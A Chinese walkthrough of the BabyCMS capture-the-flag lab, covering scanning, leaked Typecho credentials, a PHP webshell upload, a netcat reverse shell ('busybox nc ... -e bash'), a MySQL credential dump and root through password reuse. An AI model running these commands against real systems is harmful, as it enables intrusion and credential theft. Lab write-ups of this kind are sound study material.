目录

MazeSec BabyCMS

# 信息收集

# 存活主机发现与 ARP 扫描

┌──(npc㉿kali)-[~/hackmyvm/BabyCMS]
└─$ sudo arp-scan -I eth1 192.168.56.0/24

192.168.56.126  08:00:27:27:bb:b4       PCS Systemtechnik GmbH
1
2
3
4

# 端口扫描

TCP 全端口扫描

┌──(npc㉿kali)-[~/hackmyvm/BabyCMS]
└─$ nmap -p- -sT 192.168.56.126

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
1
2
3
4
5
6

# 80 端口服务探测

有一个 Typecho 博客系统

尝试几次弱口令无果,gobuster 目录扫描

┌──(npc㉿kali)-[~/hackmyvm/BabyCMS]
└─$ gobuster dir -u http://192.168.56.126 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,asp,txt,bak

/setup.txt            (Status: 200) [Size: 26]
1
2
3
4

访问 setup.txt,是 Typecho 的凭证信息

┌──(npc㉿kali)-[~/hackmyvm/BabyCMS]
└─$ curl http://192.168.56.126/setup.txt
pass:dyxBCEjovrUJa84sV03Q
1
2
3

# 后台getshell

首页有信息 可以确定存在用户 root,使用 root:dyxBCEjovrUJa84sV03Q 成功登录后台,设置允许php文件上传

文章上传php附件

域名替换为ip,访问webshell

反弹个shell到攻击机

busybox nc 192.168.56.126 -e bash
1

# 收集 mysql 凭证

查看当前开放的端口

www-data@BabyCMS:/var/www/html/usr/uploads/2025/11$ ss -tupln
Netid   State    Recv-Q   Send-Q     Local Address:Port     Peer Address:Port   
udp     UNCONN   0        0                0.0.0.0:68            0.0.0.0:*      
tcp     LISTEN   0        128              0.0.0.0:22            0.0.0.0:*      
tcp     LISTEN   0        80             127.0.0.1:3306          0.0.0.0:*      
tcp     LISTEN   0        128                 [::]:22               [::]:*      
tcp     LISTEN   0        128                    *:80                  *:*  
1
2
3
4
5
6
7

找到 typecho 的配置文件 config.inc.php,查看 mysql 凭证

www-data@BabyCMS:/var/www/html/usr/uploads/2025/11$ cd /var/www/html
www-data@BabyCMS:/var/www/html$ ls
LICENSE.txt  config.inc.php  install      setup.txt    usr
admin        index.php       install.php  typecho.zip  var
www-data@BabyCMS:/var/www/html$ cat config.inc.php 
// config db
$db = new \Typecho\Db('Pdo_Mysql', 'typecho_');
$db->addServer(array (
  'host' => 'localhost',
  'port' => 3306,
  'user' => 'pagekit_user',
  'password' => 'your_secure_password',
  'charset' => 'utf8mb4',
  'database' => 'pagekit',
  'engine' => 'InnoDB',
  'sslCa' => NULL,
  'sslVerify' => false,
), \Typecho\Db::READ | \Typecho\Db::WRITE);
\Typecho\Db::set($db);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

# mysql 信息收集

使用收集到的 mysql 凭证登录 mysql,可以在 pagekit.typecho_userlist表里找到一个疑似 caigou 用户的凭证

MariaDB [pagekit]> select * from typecho_userlist;
+----+--------+----------------------+
| id | name   | pass                 |
+----+--------+----------------------+
|  1 | caigou | dRfGtYhUjIkOlPqAeRtY |
|  2 | user1  | aBcDeFgHiJkLmNoPqRsT |
|  3 | user2  | cNNloFLE88YBIP4ZJfcy |
|  4 | user3  | xYzAbCdEfGhIjKlMnOpQ |
|  5 | user4  | pLmOkNjIbHvGcFxDrEsW |
|  6 | user5  | wVxYzAbCdEfGhIjKlMnO |
|  7 | user6  | sTrUvWxYzAbCdEfGhIjK |
|  8 | user7  | qWeRtYuIoPaSdFgHjKlZ |
|  9 | user8  | mNbVcXzAsDfGhJkLpOqR |
| 10 | user9  | kJiHgFdSaPqOwNeMtBuV |
+----+--------+----------------------+
10 rows in set (0.000 sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

使用 caigou:dRfGtYhUjIkOlPqAeRtY 登录 ssh,密码错误

测试 caigou 用户与其他密码组合时,在caigou:cNNloFLE88YBIP4ZJfcy 时成功登录 ssh

# 密码复用

尝试使用 caigou 用户凭证登录 root ,成功登录root

最后一次更新于: 2025/11/11, 13:33:05